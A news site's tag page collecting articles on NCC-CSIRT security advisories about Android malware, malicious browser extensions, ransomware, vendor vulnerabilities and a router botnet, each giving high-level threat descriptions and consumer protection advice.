TheNewsGuru

Tag: CSIRT

  • Malware Attack: NCC-CSIRT warns against malware attack on 300,000 android devices

    Malware Attack: NCC-CSIRT warns against malware attack on 300,000 android devices

    The Nigerian Communications Commission’s Computer Security Incident Response Team (NCC-CSIRT) has warned against a malware attack that steals Facebook account credentials also known as “Schoolyard Bully”.

    NCC-CSIRT said it had infected over 300,000 android devices, which prompted an advisory reminding users to only download applications from official sites and application stores.

    The Director of Public Affairs, NCC, Dr Reuben Muoka, made this known in a statement on Wednesday in Abuja.

    Muoka said that researchers from mobile security firm, Zimperium, found several apps that transmit the “Schoolyard Bully” malware.

    He said school bully disguised itself as reading and educational apps with a variety of books and topics for its victims to study.

    Mouka said that the malicious apps were available on Google Play, adding, ”yet they have already been taken down and they still spread via third-party Android app shops.

    “The NCC-CSIRT advisory in this regard further recommended that users double-check each application and uncheck boxes that request extra third-party downloads when installing apps downloaded from the Google Play Store.

    “And to use anti-malware applications to routinely scan their devices for malware.

    “The primary objective of the malware, which affects all versions of Facebook Apps for Android, is to steal Facebook account information.

    “To also steal email address and password, account ID, username, device name, device RAM (Random Access Memory), and device API (Application Programming Interface).”

    Mouka quoted NCC-CSIRT as saying: “The (Zimperium) research stated that the malware employs JavaScript injection to steal the Facebook login information.

    “The malware loads a legitimate URL (web address) inside a WebView (a WebView maps website elements that enables user interaction through Android View objects and their extensions) with malicious JavaScript injected.

    “To obtain the user’s contact information (phone number, email address, and password), then send it to the command-and-control server.”

    He said malware uses native libraries to evade detection and analysis by security software and machine learning technologies.

    “The CSIRT is the telecom sector’s cybersecurity incidence centre set up by the NCC to focus on incidents in the telecom sector and as they may affect telecom consumers and citizens at large.

    “The CSIRT also works collaboratively with Nigerian Computer Emergency Response Team (ngCERT), established by the Federal Government.

    “Established to reduce the volume of future computer risk incidents by preparing, protecting, and securing Nigerian cyberspace to forestall attacks, and problems or related events.”

  • NCC-CSIRT urges firmware update after Lenovo found vulnerabilities in own products

    NCC-CSIRT urges firmware update after Lenovo found vulnerabilities in own products

    Equipment manufacturer, Lenovo, has disclosed several vendor vulnerabilities in some of its products, which it said could lead to information disclosure, privilege escalation, and denial of service.

    The vulnerabilities primarily affect Lenovo Products (Desktop, Desktop-All in One, Hyperscale, Lenovo Notebook, Smart Office, Storage, ThinkAgile, ThinkPad, ThinkServer, ThinkStation, and ThinkSystem).

    The Nigerian Communications Commission’s Computer Security Incident Response Team (NCC-CSIRT), in its recent advisory, rated the probability of the vulnerability as high with an equally high damage potential. It, therefore, urged users of affected products to update their firmware.

    The advisory cited the Lenovo report, first published in the second week of this month, indicating that the vulnerabilities are caused by flaws in the System Management Interrupt (SMI) Set BIOS Password SMI Handler, other systems used to configure platform settings over Windows Management Instrumentation (WMI), and a buffer overflow flaw in WMI SMI Handler.

    Successful exploitation of the vulnerabilities could allow an authenticated local attacker to bypass security restrictions, gain elevated privileges and execute arbitrary code on the targeted system. The attacker could also send a specially crafted request to the targeted user to gain sensitive information, which could result in unauthorized Information disclosure, privilege escalation and denial of service on the targeted system.

    According to NCC-CSIRT, the solution to addressing the vulnerabilities is for users to update their system firmware to the newer version(s) indicated for their product model.

    The CSIRT is the telecom sector’s cyber security incidence centre set up by the NCC to focus on incidents in the telecom sector and as they may affect telecom consumers and citizens at large. The CSIRT also works collaboratively with the Nigeria Computer Emergency Response Team (ngCERT), established by the Federal Government to reduce the volume of future computer risk incidents by preparing, protecting, and securing Nigerian cyberspace to forestall attacks, and problems or related events.

  • NCC-CSIRT proffers countermeasures against website scams on Microsoft Edge Browser

    NCC-CSIRT proffers countermeasures against website scams on Microsoft Edge Browser

    The Nigerian Communications Commission’s Computer Security Incident Response Team (NCC-CSIRT) has issued an advisory for users to install trusted, up-to-date anti-virus software with an Internet security component and to customize News Feed in Microsoft Edge Browser.

    This is part of the countermeasures to lessen the chances of falling for a malicious attack that has been discovered in the browser.

    The NCC-CSIRT further advised users of the browser to practise safe Internet browsing habits and to refrain from clicking on links they are unsure of in the face of the malicious attack that has been rated as high in probability and potential damage to systems.

    The advisory stated that the malicious advertising campaign, unearthed on the Microsoft Edge Browser News Feed, redirects victims to fraudulent tech support websites and that cybercriminals have resorted to posting bizarre, attention-grabbing stories or advertisements on the Edge news feed to entice users to click on them. The malicious advertisements appear legitimate but contain malware and/or other threats.

    According to the advisory, “The Microsoft Edge News Feed is the default page that appears when a new tab is opened, and it displays information such as news, advertisements, weather, and traffic updates. Also, the following are the steps that result in being redirected to a bogus tech support page: The user clicks on a story or advertisement, the Edge browser setting is analysed for various metrics.”

    Based on the aforementioned metrics and prior results, the advisory said “if the user is adjudged to be a bot or in a location that is not of interest, the user is redirected to a harmless dummy page that is relevant to the story or advertisement initially clicked on; However, if the user is adjudged a potential victim, then the user is redirected to a tech support scam website for further exploitation.”

    Victims of the tech support website scam could have their Personally Identifiable Information (PII) and other data harvested or they could be with malware.

    The NCC, therefore, urges telecom consumers and other stakeholders in the ecosystem to install up-to-date AntiVirus software and be alert to the wiles of cybercriminals in order not to fall victim to cyber scams.

    The CSIRT is the telecom sector’s cyber security incidence centre set up by the NCC to focus on incidents in the telecom sector and as they may affect telecom consumers and citizens at large.

    The CSIRT also works collaboratively with the Nigeria Computer Emergency Response Team (ngCERT), established by the Federal Government to reduce the volume of future computer risk incidents by preparing, protecting, and securing Nigerian cyberspace to forestall attacks, and problems or related events.

  • NCC-CSIRT alerts on Google Chrome extensions malware

    NCC-CSIRT alerts on Google Chrome extensions malware

    The Nigerian Communications Commission’s Computer Security Incident Response Team (NCC-CSIRT) has identified five malicious Google Chrome Extensions that surreptitiously track online browser’s activities and steal their data.

    According to NCC-CSIRT, the five malicious extensions which the McAfee Mobile Research Team earlier discovered are Netflix Party with 800,000 downloads, Netflix Party 2 with 300,000 downloads, Full Page Screenshot Capture Screenshotting with 200,000 downloads, FlipShope Price Tracker Extension with 80,000 downloads, and AutoBuy Flash Sales with 20,000 downloads.

    The NCC-CSIRT said the five google chrome extensions identified have a high probability and damage potential and have been downloaded more than 1.4 million times and serve as access to steal users’ data. The telecom sector-focused cybersecurity protection team alerted telecom consumers to be cautious when installing any browser extension.

    “The users of these chrome extensions are unaware of their invasive functionality and privacy risk. Malicious extensions monitor victims’ visits to e-commerce websites and modify the visitor’s cookie to appear as if they came through a referrer link. Consequently, the extensions’ developers get an affiliate fee for any purchases at electronic shops,” the advisory said.

    In addition, the advisory stated that, although the google team removed several browser extensions from its Chrome Web Store, keeping malicious extensions out may be difficult. The NCC-CSIRT, thus, recommended that telecom consumers observe caution when installing any browser extension.

    “These include removing all listed extensions from their chrome browser manually. Internet users are to pay close attention to the promptings from their browser extensions, such as the permission to run on any website visited and the data requested before installing it. Although, some extensions are seemingly legit, due to the high number of user downloads, these hazardous add-ons make it imperative for users to ascertain the authenticity of extensions they access.” the advisory stated.

    Google Chrome extensions are software programmes that can be installed into Chrome in order to change the browser’s functionality. This includes adding new features to Chrome or modifying the existing behavior of the program itself to make it more convenient for the user. They serve purposes such as block ads, integration with password managers and sourcing coupons as items sent to a shopping cart.

    The Computer Security Incident Response Team (CSIRT) is the telecom sector’s cyber security incidence centre set up by the NCC to focus on incidents in the telecom sector and as they may affect telecom consumers and citizens at large.

  • Yanluowang Ransomware: NCC-CSIRT urges stronger security measures

    Yanluowang Ransomware: NCC-CSIRT urges stronger security measures

    The Nigerian Communications Commission’s Computer Security Incident Response Team (NCC-CSIRT) has urged organisations to adopt stronger cybersecurity measures.

    These measures include ensuring that organisations’ employees use strong, unique passwords for every account and enabling multi-factor authentication (2FA) wherever it is supported to prevent ransomware attacks as well as advising organisations to ensure regular systems backup.

    The NCC-CSIRT’s warning contained in its advisory of August 12, 2022, came after the Yanluowang threat actors gained access to Cisco’s network using an employee’s stolen credentials after hijacking the employee’s personal Google account containing credentials synced from their browser.

    Ransomware is a malware designed to deny a user or organization access to files on their computer until they pay the attackers.

    Cisco reported the security incident on its corporate network but said it did not identify any impact on its business although the threat actors had published a list of files from this security incident on the dark web on August 10.

    NCC-CSIRT estimated potential damage from the incident to be critical while predicting that successful exploitation of the ransomware will result in ransomware deployment to compromise computer systems, sensitive products and customers’ data theft and exposure, as well as huge financial loss to organizations by incurring significant indirect costs and could also mar their reputations.

    The team said, “The first step to preventing ransomware attacks is to ensure that employees are using strong, unique passwords for every account and enabling multi-factor authentication (2FA) wherever it’s supported.”

    It further disclosed that “In response to the attack, Cisco has immediately implemented a company-wide password reset. Users of Cisco products should ensure a successful password reset.

    “As a precaution, the company has also created two Clam AntiVirus signatures (Win.Exploit.Kolobko-9950675-0 and Win.Backdoor.Kolobko-9950676-0) to disinfect any potentially compromised assets. Clam AntiVirus Signatures (or ClamAV) is a multi-platform antimalware toolkit that can detect a wide range of malware and viruses.

    “User education is critical in thwarting this type of attacks or any similar attacks, including ensuring that employees are aware of the legitimate channels through which support personnel will contact users, so that employees can identify fraudulent attempts to obtain sensitive information. Organisations should ensure regular systems backup,” the advisory urged.

    The CSIRT is the telecom sector’s cyber security incidence centre set up by the NCC to focus on incidents in the telecom sector and as they may affect telecom consumers and citizens at large.

    The CSIRT also works collaboratively with the Nigeria Computer Emergency Response Team (ngCERT), established by the Federal Government to reduce the volume of future computer risks incidents by preparing, protecting and securing the Nigerian cyberspace to forestall attacks, problems or related events.

  • NCC-CSIRT flags ‘HiddenAds’ malware that jeopardizes users’ privacy

    NCC-CSIRT flags ‘HiddenAds’ malware that jeopardizes users’ privacy

    The Nigerian Communications Commission’s Computer Security Incident Response Team (NCC-CSIRT) has flagged a new malware, HiddenAds, which has infiltrated Google Play Store that can impact device performance and jeopardize users’ privacy.

    In its advisory of August 8, 2022, NCC-CSIRT classified the virus, first identified by the McAfee Mobile Research Team, as high in probability and damage potential.

    The malware infiltrated the Google Play Store in the form of several device cleaners or optimization apps.

    According to the summary provided by NCC-CSIRT “Upon installation, it can run malicious services without the user opening the app. It also spams the user with irrelevant advertisements. The apps have received downloads ranging from 100,000 to over a million.

    “Some of the apps HiddenAds masquerades as are: Junk Cleaner, EasyCleaner, Power Doctor, Carpet Clean, Super Clean, Meteor Clean, Strong Clean, Windy Clean, Fingertip Cleaner, Keep Clean, Full Clean – Clean Cache, Quick Cleaner, and Cool Clean.

    “When a user installs any of the aforementioned apps, whether the user has opened the app or not, a malicious service is immediately installed on the device. The app will then attempt to blend into the app tray by changing its icon to the Google Play icon that every Android user is familiar with. Its name will also change to ‘Google Play’ or ‘Setting’. The device will then be bombarded with ads in a variety of deceptive ways, severely impairing the user experience,” the advisory stated.

    Anyone that installs the compromised app will experience their device performance suffering significantly, clicking on the ads may result in stealth downloads/installation of other malware, users may inadvertently subscribe to services and be billed on a monthly basis, and the privacy of users will be jeopardized.

    NCC-CSIRT advised users to avoid downloading questionable apps or apps they are unsure about while those who have installed any of the identified malicious apps should immediately delete them.

    It further disclosed that where the malicious app’s icon and name have changed, it can be identified by the fact that it is removable while the legitimate Google Play app cannot be uninstalled.

    The advisory recommended the installation of anti-virus/anti-malware software with a proven track record for detecting and removing malware.

    The Computer Security Incident Response Team (CSIRT) is the telecom sector’s cyber security incidence centre set up by the NCC to focus on incidents in the telecom sector and as they may affect telecom consumers and citizens at large.

    The CSIRT also works collaboratively with the Nigeria Computer Emergency Response Team (ngCERT), established by the Federal Government to reduce the volume of future computer risks incidents by preparing, protecting and securing the Nigerian cyberspace to forestall attacks, problems or related events.

  • NCC-CSIRT flags ‘HiddenAds’ malware that jeopardizes users’ privacy

    NCC-CSIRT flags ‘HiddenAds’ malware that jeopardizes users’ privacy

    The Nigerian Communications Commission’s Computer Security Incident Response Team (NCC-CSIRT) has flagged a new malware, HiddenAds, which has infiltrated Google Play Store that can impact device performance and jeopardize users’ privacy.

    In its advisory of August 8, 2022, NCC-CSIRT classified the virus, first identified by the McAfee Mobile Research Team, as high in probability and damage potential.

    The malware infiltrated the Google Play Store in the form of several device cleaners or optimization apps.

    According to the summary provided by NCC-CSIRT “Upon installation, it can run malicious services without the user opening the app. It also spams the user with irrelevant advertisements. The apps have received downloads ranging from 100,000 to over a million.

    “Some of the apps HiddenAds masquerades as are: Junk Cleaner, EasyCleaner, Power Doctor, Carpet Clean, Super Clean, Meteor Clean, Strong Clean, Windy Clean, Fingertip Cleaner, Keep Clean, Full Clean – Clean Cache, Quick Cleaner, and Cool Clean.

    “When a user installs any of the aforementioned apps, whether the user has opened the app or not, a malicious service is immediately installed on the device. The app will then attempt to blend into the app tray by changing its icon to the Google Play icon that every Android user is familiar with. Its name will also change to ‘Google Play’ or ‘Setting’. The device will then be bombarded with ads in a variety of deceptive ways, severely impairing the user experience,” the advisory stated.

    Anyone that installs the compromised app will experience their device performance suffering significantly, clicking on the ads may result in stealth downloads/installation of other malware, users may inadvertently subscribe to services and be billed on a monthly basis, and the privacy of users will be jeopardized.

    NCC-CSIRT advised users to avoid downloading questionable apps or apps they are unsure about while those who have installed any of the identified malicious apps should immediately delete them.

    It further disclosed that where the malicious app’s icon and name have changed, it can be identified by the fact that it is removable while the legitimate Google Play app cannot be uninstalled.

    The advisory recommended the installation of anti-virus/anti-malware software with a proven track record for detecting and removing malware.

    The Computer Security Incident Response Team (CSIRT) is the telecom sector’s cyber security incidence centre set up by the NCC to focus on incidents in the telecom sector and as they may affect telecom consumers and citizens at large.

    The CSIRT also works collaboratively with the Nigeria Computer Emergency Response Team (ngCERT), established by the Federal Government to reduce the volume of future computer risks incidents by preparing, protecting and securing the Nigerian cyberspace to forestall attacks, problems or related events.

  • Why you should set up automatic update for your antivirus – NCC

    Why you should set up automatic update for your antivirus – NCC

    The Nigerian Communications Commission (NCC) has advised telecom consumers and other Information and Communications Technology (ICT) end users on the need to always enable automatic update features for AVAST and AVG antiviruses to prevent potential cyber vulnerabilities.

    This was contained in a new advisory released by the Computer Security Incident Response Team (CSIRT), the cybersecurity centre for the telecom sector established by the Commission, in continuation of its resolve to always keep Nigerians safe in the cyber space.

    The advisory noted that cyber vulnerability in AVAST and AVG Antiviruses can lead to attacks on millions of devices with high impact in terms of consequences to the ICT user. The threat types as a result of this vulnerability are Bypass Authentication, Remote Code Execution and Unauthorised Access while consequences range from Privilege Escalation, Bypass Security Products, Overwrite System Components and corrupting the Operating System.

    According to CSIRT, researchers at SentinelOne security firm have discovered two potentially damaging vulnerabilities in AVAST and AVG antivirus products that allow attackers to escalate privileges enabling them to disable security products, overwrite system components, corrupt the operating system, or perform malicious operations unimpeded.

    “Two vulnerabilities identified as CVE-2022-26522 and CVE-2022-26523 targeted the “Anti Rootkit” driver of Avast antivirus (also used by AVG) allowing an attacker with limited privileges on the targeted system to execute code in system mode (kernel mode) and take complete control of the device. Moreover, the vulnerabilities allow complete take-over of a device, even without privileges, due to the ability to execute code in kernel mode,” the CSIRT said in the advisory.

    However, the cybersecurity centre has offered a tripartite measures that should be taken by Internet/ICT users to prevent being vulnerable to the cyber threats. They include enabling automatic update feature for AVAST and AVG antiviruses, upgrading AVAST and AVG antiviruses to version 22.1.2504, as well as carrying out regular patch management.

  • NCC uncovers cyber threats to Windows platforms, routers

    NCC uncovers cyber threats to Windows platforms, routers

    The Computer Security Incidents Response Team (CSIRT) set up by the Nigerian Communications Commission (NCC) for the telecoms sector, has discovered two new separate cyber threats targeting Windows Platforms and a particular kind of routers respectively.

    The discoveries were made known in two separate advisories released by the cyber-space protection team earlier this week.

    The first cyber threat is a ransomeware known as ‘Lokilocker’, which is capable of wiping data from all version of Windows systems or platforms. It causes data loss, and denial of service (DoS), which reduces user’s productivity.

    “Lokilocker”, is a relatively new ransomware that has been discovered by security researchers and belonging to the ransomware family. Lokilocker operates by encrypting user files and renders the compromised system useless if the victim does not pay the demanded ransom in time.

    To hide the malicious activity, the ransomware displays a fake window update screen, cancel specific processes and services, and completely disables the task manager, windows error reporting, machine firewall and windows defender of the compromised system.

    Sadly, it also has in-built processes that prevent data recovery as it deletes backup files, shadow copies, and removes system restore points. It also overwrites the user login note and modifies original equipment manufacturer (OEM) information in the registry of the compromised system.

    Thus, the NCC CSIRT states: “To protect against infections by LokiLocker and similar ransomware, the best rule is to always have a backup copy of your data, which should be stored offline,” the advisory stated.

    Additionally, according to CSIRT, “all downloads and email attachments should be opened with caution, even if they are from trusted sites or senders. Users should also ensure they attachments are scanned with an up-to-date antimalware solution, before opening.”

    The second cyber threat discovered by the NCC CSIRT is a Botnet that targets the Microtik version of Routers. As CSIRT revealed, thousands of routers from Microtik which have been found to be vulnerable are being used to constitute what has been named one of the largest botnets in history.

    This botnet exploits an already-known vulnerability, which allows unauthenticated remote attackers to read arbitrary files and authenticated remote attackers to write arbitrary files, due to a directory traversal vulnerability in the WinBox interface. The vulnerability which was previously fixed allowed the perpetrators to enslave all the routers and then rent them out as a service.

    In accordance with new research published by Avast, a cryptocurrency mining campaign taking advantage of the newly disrupted Glupteba botnet as well as the famed Trickbot malicious software were found to have been disseminated by the very same command-and-control (C2) server. The C2 server functions as botnet-as-a-service, which controls nearly 230,000 vulnerable MicroTik routers. The Botnet, however, has been linked to what is now called the Meris Botnet.

    The threat types emanating from the botnet include bypass authentication, data loss, denial of service, remote code execution, sniff password and unauthorized access. These situations result in dangers to victims of this cyber threat including malware distribution, mining cryptocurrency, thereby increasing the use system resources, remote code execution and data theft.

    To be protected against this botnet, NCC CISRT asdvised users to update or apply the latest patches to their routers early, set strong router passwords, disable the administration interface of the routers from the public, stay away from illegitimate or cracked software versions of legitimate applications, and use decent antivirus software with in-built web-filtering, and apply the latest patches as soon as they arrive.